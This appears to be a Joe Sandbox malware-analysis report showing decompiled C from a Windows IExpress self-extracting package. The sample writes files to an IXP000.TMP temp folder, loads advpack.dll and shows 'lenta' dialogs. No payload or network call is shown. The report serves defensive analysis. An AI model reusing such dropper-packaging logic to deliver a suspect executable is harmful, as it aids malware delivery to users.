                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Message$BeepVersion
                                                                      • String ID: 3$lenta
                                                                      • API String ID: 2519184315-4216304122
                                                                      • Opcode ID: 21bd32437bc162f3de14cabeb84241e920b05ba456f8c0dfc6cebee449ca9da8
                                                                      • Instruction ID: a844b60666d9946c60e3a7c18ae3db8c347781d7e9a0b6549882fdba3e923fb0
                                                                      • Opcode Fuzzy Hash: 21bd32437bc162f3de14cabeb84241e920b05ba456f8c0dfc6cebee449ca9da8
                                                                      • Instruction Fuzzy Hash: 1C91D5F1F222259FEB7D8A29CC81BAAB7B1FB45304F0601A9C969D7245D7748981CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E011D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				signed int _t9;
                                                                      				signed char _t14;
                                                                      				struct HINSTANCE__* _t15;
                                                                      				void* _t18;
                                                                      				CHAR* _t26;
                                                                      				void* _t27;
                                                                      				signed int _t28;
                                                                      
                                                                      				_t27 = __esi;
                                                                      				_t18 = __ebx;
                                                                      				_t9 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t9 ^ _t28;
                                                                      				_push(__ecx);
                                                                      				E011D1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      				_t26 = "advpack.dll";
                                                                      				E011D658A( &_v268, 0x104, _t26);
                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                      					_t15 = LoadLibraryA(_t26);
                                                                      				} else {
                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                      				}
                                                                      				return E011D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                      			}













                                                                      0x011d6495
                                                                      0x011d6495
                                                                      0x011d64a0
                                                                      0x011d64a7
                                                                      0x011d64ab
                                                                      0x011d64bd
                                                                      0x011d64c2
                                                                      0x011d64d3
                                                                      0x011d64df
                                                                      0x011d64e8
                                                                      0x011d6502
                                                                      0x011d64ee
                                                                      0x011d64f9
                                                                      0x011d64f9
                                                                      0x011d6516

                                                                      APIs
                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 011D64DF
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 011D64F9
                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 011D6502
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AttributesFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                      • API String ID: 438848745-258089097
                                                                      • Opcode ID: 13f1b8a6e6d4b158adee3d9f7d9dae4ab726783d113b5d41673e79ecd565acbb
                                                                      • Instruction ID: 3cf43d6199e27c2338b17f2e596358502279f5eea5c1199464b59056f01965b2
                                                                      • Opcode Fuzzy Hash: 13f1b8a6e6d4b158adee3d9f7d9dae4ab726783d113b5d41673e79ecd565acbb
                                                                      • Instruction Fuzzy Hash: 3A01D170A01108ABDB2CEB74EC48EEA7778EB60314F8001A9E595931C4DF709AC6CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                      				void* _v8;
                                                                      				char* _v12;
                                                                      				intOrPtr _v16;
                                                                      				void* _v20;
                                                                      				intOrPtr _v24;
                                                                      				int _v28;
                                                                      				int _v32;
                                                                      				void* _v36;
                                                                      				int _v40;
                                                                      				void* _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				long _t68;
                                                                      				void* _t70;
                                                                      				void* _t73;
                                                                      				void* _t79;
                                                                      				void* _t83;
                                                                      				void* _t87;
                                                                      				void* _t88;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr _t99;
                                                                      				int _t101;
                                                                      				void* _t103;
                                                                      				void* _t106;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      
                                                                      				_v12 = __edx;
                                                                      				_t99 = __ecx;
                                                                      				_t106 = 0;
                                                                      				_v16 = __ecx;
                                                                      				_t87 = 0;
                                                                      				_t103 = 0;
                                                                      				_v20 = 0;
                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                      					L19:
                                                                      					_t106 = 1;
                                                                      				} else {
                                                                      					_t62 = 0;
                                                                      					_v8 = 0;
                                                                      					while(1) {
                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                      						if(E011D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                      							goto L20;
                                                                      						}
                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                      						_v28 = _t68;
                                                                      						if(_t68 == 0) {
                                                                      							_t99 = _v16;
                                                                      							_t70 = _v8 + _t99;
                                                                      							_t93 = _v24;
                                                                      							_t87 = _v20;
                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                      								goto L18;
                                                                      							}
                                                                      						} else {
                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                      							if(_t103 != 0) {
                                                                      								_t73 = GlobalLock(_t103);
                                                                      								_v36 = _t73;
                                                                      								if(_t73 != 0) {
                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                      										L15:
                                                                      										GlobalUnlock(_t103);
                                                                      										_t99 = _v16;
                                                                      										L18:
                                                                      										_t87 = _t87 + 1;
                                                                      										_t62 = _v8 + 0x3c;
                                                                      										_v20 = _t87;
                                                                      										_v8 = _v8 + 0x3c;
                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                      											continue;
                                                                      										} else {
                                                                      											goto L19;
                                                                      										}
                                                                      									} else {
                                                                      										_t79 = _v44;
                                                                      										_t88 = _t106;
                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                      										_t101 = _v28;
                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                      										_t97 = _v48;
                                                                      										_v36 = _t83;
                                                                      										_t109 = _t83;
                                                                      										do {
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E011D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E011D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                      											_t109 = _t109 + 0x18;
                                                                      											_t88 = _t88 + 4;
                                                                      										} while (_t88 < 8);
                                                                      										_t87 = _v20;
                                                                      										_t106 = 0;
                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                      												GlobalUnlock(_t103);
                                                                      											} else {
                                                                      												goto L15;
                                                                      											}
                                                                      										} else {
                                                                      											goto L15;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      				}
                                                                      				L20:
                                                                      				 *_a8 = _t87;
                                                                      				if(_t103 != 0) {
                                                                      					GlobalFree(_t103);
                                                                      				}
                                                                      				return _t106;
                                                                      			}

































                                                                      0x011d28f1
                                                                      0x011d28f4
                                                                      0x011d28f7
                                                                      0x011d28f9
                                                                      0x011d28fc
                                                                      0x011d28ff
                                                                      0x011d2901
                                                                      0x011d2907
                                                                      0x011d2a62
                                                                      0x011d2a64
                                                                      0x011d290d
                                                                      0x011d290d
                                                                      0x011d290f
                                                                      0x011d2912
                                                                      0x011d2920
                                                                      0x011d2937
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2944
                                                                      0x011d294a
                                                                      0x011d294f
                                                                      0x011d2a2f
                                                                      0x011d2a32
                                                                      0x011d2a34
                                                                      0x011d2a37
                                                                      0x011d2a41
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2955
                                                                      0x011d295e
                                                                      0x011d2962
                                                                      0x011d2969
                                                                      0x011d296f
                                                                      0x011d2974
                                                                      0x011d298c
                                                                      0x011d2a20
                                                                      0x011d2a21
                                                                      0x011d2a27
                                                                      0x011d2a4c
                                                                      0x011d2a4f
                                                                      0x011d2a50
                                                                      0x011d2a53
                                                                      0x011d2a56
                                                                      0x011d2a5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d29b2
                                                                      0x011d29b2
                                                                      0x011d29b5
                                                                      0x011d29bd
                                                                      0x011d29c3
                                                                      0x011d29cc
                                                                      0x011d29d5
                                                                      0x011d29d7
                                                                      0x011d29da
                                                                      0x011d29dd
                                                                      0x011d29df
                                                                      0x011d29ec
                                                                      0x011d29f8
                                                                      0x011d29fc
                                                                      0x011d29ff
                                                                      0x011d2a02
                                                                      0x011d2a07
                                                                      0x011d2a0a
                                                                      0x011d2a0f
                                                                      0x011d2a19
                                                                      0x011d2a81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2a0f
                                                                      0x011d298c
                                                                      0x011d2974
                                                                      0x011d2962
                                                                      0x00000000
                                                                      0x011d294f
                                                                      0x011d2912
                                                                      0x011d2a65
                                                                      0x011d2a68
                                                                      0x011d2a6c
                                                                      0x011d2a6f
                                                                      0x011d2a6f
                                                                      0x011d2a7d

                                                                      APIs
                                                                      • GlobalFree.KERNEL32 ref: 011D2A6F
                                                                        • Part of subcall function 011D2773: CharUpperA.USER32(DC3102D5,00000000,00000000,00000000), ref: 011D27A8
                                                                        • Part of subcall function 011D2773: CharNextA.USER32(0000054D), ref: 011D27B5
                                                                        • Part of subcall function 011D2773: CharNextA.USER32(00000000), ref: 011D27BC
                                                                        • Part of subcall function 011D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2829
                                                                        • Part of subcall function 011D2773: RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2852
                                                                        • Part of subcall function 011D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2870
                                                                        • Part of subcall function 011D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D28A0
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,011D3938,?,?,?,?,-00000005), ref: 011D2958
                                                                      • GlobalLock.KERNEL32 ref: 011D2969
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,011D3938,?,?,?,?,-00000005,?), ref: 011D2A21
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 011D2A81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3949799724-0
                                                                      • Opcode ID: b79f1e0633f31ebbecc0503bd24b85414ee72edbeeb5664695caaa043b508589
                                                                      • Instruction ID: e0ce70fd19471a71ea47a78e1171a0336329a8b287f2203daa62cf85164d47f3
                                                                      • Opcode Fuzzy Hash: b79f1e0633f31ebbecc0503bd24b85414ee72edbeeb5664695caaa043b508589
                                                                      • Instruction Fuzzy Hash: 74514E31D01229DFDB29DF98D884AAEFBB5FF48705F14412AE925E3211D7319941CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D47E0(intOrPtr* __ecx) {
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr _t9;
                                                                      				void* _t11;
                                                                      				void* _t19;
                                                                      				intOrPtr* _t22;
                                                                      				void _t24;
                                                                      				struct HWND__* _t25;
                                                                      				struct HWND__* _t26;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t33 = __ecx;
                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                      				if(_t34 != 0) {
                                                                      					_t22 = _t33;
                                                                      					_t27 = _t22 + 1;
                                                                      					do {
                                                                      						_t6 =  *_t22;
                                                                      						_t22 = _t22 + 1;
                                                                      					} while (_t6 != 0);
                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                      					 *_t34 = _t24;
                                                                      					if(_t24 != 0) {
                                                                      						_t28 = _t33;
                                                                      						_t19 = _t28 + 1;
                                                                      						do {
                                                                      							_t9 =  *_t28;
                                                                      							_t28 = _t28 + 1;
                                                                      						} while (_t9 != 0);
                                                                      						E011D1680(_t24, _t28 - _t19 + 1, _t33);
                                                                      						_t11 =  *0x11d91e0; // 0xec7270
                                                                      						 *(_t34 + 4) = _t11;
                                                                      						 *0x11d91e0 = _t34;
                                                                      						return 1;
                                                                      					}
                                                                      					_t25 =  *0x11d8584; // 0x0
                                                                      					E011D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                      					LocalFree(_t34);
                                                                      					L2:
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 =  *0x11d8584; // 0x0
                                                                      				E011D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                      				goto L2;
                                                                      			}















                                                                      0x011d47e8
                                                                      0x011d47f0
                                                                      0x011d47f4
                                                                      0x011d480f
                                                                      0x011d4811
                                                                      0x011d4814
                                                                      0x011d4814
                                                                      0x011d4816
                                                                      0x011d4817
                                                                      0x011d4829
                                                                      0x011d482b
                                                                      0x011d482f
                                                                      0x011d484f
                                                                      0x011d4852
                                                                      0x011d4855
                                                                      0x011d4855
                                                                      0x011d4857
                                                                      0x011d4858
                                                                      0x011d4860
                                                                      0x011d4865
                                                                      0x011d486a
                                                                      0x011d486f
                                                                      0x00000000
                                                                      0x011d4876
                                                                      0x011d4831
                                                                      0x011d4841
                                                                      0x011d4847
                                                                      0x011d480b
                                                                      0x00000000
                                                                      0x011d480b
                                                                      0x011d47f6
                                                                      0x011d4806
                                                                      0x00000000

                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,011D4E6F), ref: 011D47EA
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 011D4823
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 011D4847
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$pr
                                                                      • API String ID: 359063898-931104669
                                                                      • Opcode ID: d4d6e80450ea0ea05e2536021648b201d16906923d08d6f9dfc84d4573e20dcf
                                                                      • Instruction ID: 1a5869132e575057ea66705c6f5e33088773812df3fe4041c3cf5ed97b1d6309
                                                                      • Opcode Fuzzy Hash: d4d6e80450ea0ea05e2536021648b201d16906923d08d6f9dfc84d4573e20dcf
                                                                      • Instruction Fuzzy Hash: 851159742026026FD72D8E74E818F733B6AEB85380B048528E98287B49CB359842C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 32%
                                                                      			E011D4169(void* __eflags) {
                                                                      				int _t18;
                                                                      				void* _t21;
                                                                      
                                                                      				_t20 = E011D468F("FINISHMSG", 0, 0);
                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                      				if(_t21 != 0) {
                                                                      					if(E011D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                      							L7:
                                                                      							return LocalFree(_t21);
                                                                      						}
                                                                      						_push(0);
                                                                      						_push(0x40);
                                                                      						_push(0);
                                                                      						_push(_t21);
                                                                      						_t18 = 0x3e9;
                                                                      						L6:
                                                                      						E011D44B9(0, _t18);
                                                                      						goto L7;
                                                                      					}
                                                                      					_push(0);
                                                                      					_push(0x10);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_t18 = 0x4b1;
                                                                      					goto L6;
                                                                      				}
                                                                      				return E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      			}





                                                                      0x011d417d
                                                                      0x011d418f
                                                                      0x011d4193
                                                                      0x011d41b7
                                                                      0x011d41d3
                                                                      0x011d41e6
                                                                      0x00000000
                                                                      0x011d41e7
                                                                      0x011d41d5
                                                                      0x011d41d6
                                                                      0x011d41d8
                                                                      0x011d41d9
                                                                      0x011d41da
                                                                      0x011d41df
                                                                      0x011d41e1
                                                                      0x00000000
                                                                      0x011d41e1
                                                                      0x011d41b9
                                                                      0x011d41ba
                                                                      0x011d41bc
                                                                      0x011d41bd
                                                                      0x011d41be
                                                                      0x00000000
                                                                      0x011d41be
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,011D30B4), ref: 011D4189
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,011D30B4), ref: 011D41E7
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$FINISHMSG
                                                                      • API String ID: 3507850446-3091758298
                                                                      • Opcode ID: 015c69582964f99e6453d8ff95b0b4c9f0604138b0c3c32ffec29f9dd9ddc0d3
                                                                      • Instruction ID: 8bfaaab32cc85bfea9b1c4520780c31d605b0e87f55ea478eb1aed71d8002821
                                                                      • Opcode Fuzzy Hash: 015c69582964f99e6453d8ff95b0b4c9f0604138b0c3c32ffec29f9dd9ddc0d3
                                                                      • Instruction Fuzzy Hash: 9D01ADA13012257BF32D2A799C85F7B658EDB94699F014025B706E2D84DB78EC0141B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v520;
                                                                      				void* __esi;
                                                                      				signed int _t11;
                                                                      				void* _t14;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      				struct HWND__* _t34;
                                                                      				signed int _t35;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t27 = __ebx;
                                                                      				_t11 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t11 ^ _t35;
                                                                      				_t34 = _a4;
                                                                      				_t14 = _a8 - 0x110;
                                                                      				if(_t14 == 0) {
                                                                      					_t32 = GetDesktopWindow();
                                                                      					E011D43D0(_t34, _t15);
                                                                      					_v520 = 0;
                                                                      					LoadStringA( *0x11d9a3c, _a16,  &_v520, 0x200);
                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                      					MessageBeep(0xffffffff);
                                                                      					goto L6;
                                                                      				} else {
                                                                      					if(_t14 != 1) {
                                                                      						L4:
                                                                      						_t23 = 0;
                                                                      					} else {
                                                                      						_t32 = _a12;
                                                                      						if(_t32 - 0x83d > 1) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							EndDialog(_t34, _t32);
                                                                      							L6:
                                                                      							_t23 = 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                      			}













                                                                      0x011d19e0
                                                                      0x011d19e0
                                                                      0x011d19eb
                                                                      0x011d19f2
                                                                      0x011d19f9
                                                                      0x011d19fc
                                                                      0x011d1a01
                                                                      0x011d1a2a
                                                                      0x011d1a2e
                                                                      0x011d1a3e
                                                                      0x011d1a4f
                                                                      0x011d1a62
                                                                      0x011d1a6a
                                                                      0x00000000
                                                                      0x011d1a03
                                                                      0x011d1a06
                                                                      0x011d1a20
                                                                      0x011d1a20
                                                                      0x011d1a08
                                                                      0x011d1a08
                                                                      0x011d1a14
                                                                      0x00000000
                                                                      0x011d1a16
                                                                      0x011d1a18
                                                                      0x011d1a70
                                                                      0x011d1a72
                                                                      0x011d1a72
                                                                      0x011d1a14
                                                                      0x011d1a06
                                                                      0x011d1a81

                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 011D1A18
                                                                      • GetDesktopWindow.USER32 ref: 011D1A24
                                                                      • LoadStringA.USER32(?,?,00000200), ref: 011D1A4F
                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 011D1A62
                                                                      • MessageBeep.USER32(000000FF), ref: 011D1A6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1273765764-0
                                                                      • Opcode ID: 20b9de779fe8610bf306d18e3dc8387effd785fcbdb0b1ae7a859e0fa1e00d25
                                                                      • Instruction ID: dbd0ca8c42cbcdc6a87deb064ff0a51d8041826c8214a04b3f18404993688e4b
                                                                      • Opcode Fuzzy Hash: 20b9de779fe8610bf306d18e3dc8387effd785fcbdb0b1ae7a859e0fa1e00d25
                                                                      • Instruction Fuzzy Hash: 4311C83150216AAFDB28EF78ED48BAE77F8EF49340F004164E522D3185DB309E41CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E011D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				long _v272;
                                                                      				void* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t15;
                                                                      				long _t28;
                                                                      				struct _OVERLAPPED* _t37;
                                                                      				void* _t39;
                                                                      				signed int _t40;
                                                                      
                                                                      				_t15 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t15 ^ _t40;
                                                                      				_v272 = _v272 & 0x00000000;
                                                                      				_push(__ecx);
                                                                      				_v276 = _a16;
                                                                      				_t37 = 1;
                                                                      				E011D1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      				E011D658A( &_v268, 0x104, _a12);
                                                                      				_t28 = 0;
                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                      				if(_t39 != 0xffffffff) {
                                                                      					_t28 = _a4;
                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                      						 *0x11d9124 = 0x80070052;
                                                                      						_t37 = 0;
                                                                      					}
                                                                      					CloseHandle(_t39);
                                                                      				} else {
                                                                      					 *0x11d9124 = 0x80070052;
                                                                      					_t37 = 0;
                                                                      				}
                                                                      				return E011D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                      			}















                                                                      0x011d63cb
                                                                      0x011d63d2
                                                                      0x011d63d8
                                                                      0x011d63ea
                                                                      0x011d63f3
                                                                      0x011d6401
                                                                      0x011d6402
                                                                      0x011d6410
                                                                      0x011d6415
                                                                      0x011d6433
                                                                      0x011d6438
                                                                      0x011d6449
                                                                      0x011d6463
                                                                      0x011d646d
